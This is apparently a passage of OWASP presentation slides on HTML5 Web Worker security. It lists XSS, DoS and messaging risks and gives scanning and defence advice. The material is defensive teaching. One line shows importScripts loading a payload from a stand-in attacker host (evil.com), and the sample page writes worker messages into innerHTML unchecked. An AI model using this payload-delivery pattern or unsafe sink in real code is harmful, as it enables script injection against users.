  • 67. Web Worker – Hacks! Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
  • 68. Web Worker – Hacks!  Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> OWASP 68
  • 69. Web Workers – Hacks! Possible to cause XSS Running script Passing hidden payload Also, web workers can help in embedding silent running js file and can be controlled. Can be a tool for payload delivery and control within browser framework importScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
  • 70. Scan and Defend Scan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc. Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
  • 71. APIs … HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
  • 72. Resources/References http://www.html5rocks.com/en/ (Solid stuff) https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff) http://html5sec.org/ (Quick Cheat sheet) http://html5security.org/ (Good resources) http://blog.kotowicz.net/ (Interesting work) OWASP 72
  • 73. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 73